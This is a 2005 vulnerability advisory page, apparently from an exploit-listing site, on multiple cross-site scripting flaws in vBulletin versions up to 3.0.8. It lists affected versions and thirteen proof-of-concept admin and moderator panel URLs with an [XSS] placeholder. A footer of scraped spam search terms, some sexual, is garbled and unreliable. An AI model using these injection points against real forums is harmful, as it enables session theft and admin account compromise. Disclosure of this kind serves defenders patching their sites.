exploits , vulnerabilities , articles , VBulletin Multiple Cross-Site Scripting Vulnerabilities
| Title |
VBulletin Multiple Cross-Site Scripting Vulnerabilities |
| Published |
2005-09-19-12:00AM |
| Updated |
2005-09-19-04:58PM |
| Class |
Input Validation Error |
| CVE |
CVE-MAP-NOMATCH |
| Remote |
Yes |
| Local |
No |
| Credit |
deluxe <deluxe@security-project.org> is credited with the discovery of this vulnerability. |
| Vulnerable |
VBulletin VBulletin 3.0.8
VBulletin VBulletin 3.0.7
VBulletin VBulletin 3.0.6
VBulletin VBulletin 3.0.5
VBulletin VBulletin 3.0.4
VBulletin VBulletin 3.0.3
VBulletin VBulletin 3.0.2
VBulletin VBulletin 3.0.1
VBulletin VBulletin 3.0 Gamma
VBulletin VBulletin 3.0 beta 7
VBulletin VBulletin 3.0 beta 6
VBulletin VBulletin 3.0 beta 5
VBulletin VBulletin 3.0 beta 4
VBulletin VBulletin 3.0 beta 3
VBulletin VBulletin 3.0 beta 2
VBulletin VBulletin 3.0
VBulletin VBulletin 2.3.4
VBulletin VBulletin 2.3.3
VBulletin VBulletin 2.3.2
VBulletin VBulletin 2.3 .0
VBulletin VBulletin 2.2.9
VBulletin VBulletin 2.2.8
VBulletin VBulletin 2.2.7
VBulletin VBulletin 2.2.6
VBulletin VBulletin 2.2.5
VBulletin VBulletin 2.2.4
VBulletin VBulletin 2.2.3
VBulletin VBulletin 2.2.2
VBulletin VBulletin 2.2.1
VBulletin VBulletin 2.2 .0
VBulletin VBulletin 2.0.3
VBulletin VBulletin 2.0 rc 3
VBulletin VBulletin 2.0 rc 2
VBulletin VBulletin 1.0.1 lite |
| Not Vulnerable |
VBulletin VBulletin 3.0.9 |
| Code |
No exploit is required.
The following proof of concept URI are available:
http://www.example.com/modcp/index.php?do=frames&loc=[XSS]
http://www.example.com/modcp/user.php?do=gethost&ip=[XSS]
http://www.example.com/admincp/css.php?do=doedit&dostyleid=1&group=[XSS]
http://www.example.com/admincp/index.php?redirect=[XSS]
http://www.example.com/admincp/index.php?do=frames&loc=[XSS]
http://www.example.com/admincp/user.php?do=emailpassword&email=[XSS]
http://www.example.com/admincp/usertitle.php?do=gethost&ip=[XSS]
http://www.example.com/admincp/language.php?do=rebuild&goto=[XSS]
http://www.example.com/admincp/modlog.php?do=view&orderby=[XSS]
http://www.example.com/admincp/template.php?do=colorconverter&hex=[XSS]
http://www.example.com/admincp/template.php?do=colorconverter&rgb=[XSS]
http://www.example.com/admincp/template.php?do=modify&expandset=[XSS]
http://www.example.com/admincp/vbugs_admin.php?do=updateseverity&vbug_severityid=1%20/*[XSS]
|
| TXT |
 |
|
Advertising
|
|
Copyright 2007,
SecurityDot
Sat, 19 Dec 2009 02:28:07 +0000
Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS
EXPLOITS
VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
DESIBABA www.sex ar www.sextv. bho.bk wwwphonero news for c bho.bk www.76la.c toons www.world Video free In the thi sex ve Crack Data sexi giral Free xxx p samsoon.cn sextit EZArticleH Crack+Data Joomla+Com CMS is Fre news searc iigeqytefy u18143394. www.81city fat indian Lo 13140 news for c vBulletin Idian sexy Www.sexani joomla+rem Bollewood. wwww.skf-f linux 2.6. lesibian k animals ma port 1433 www.zhmf51 zb41p14 sexo anima www.tagtag vBulletin iipeqimymu emon www.chuanq Nice work! www.indian www.875.gd
|
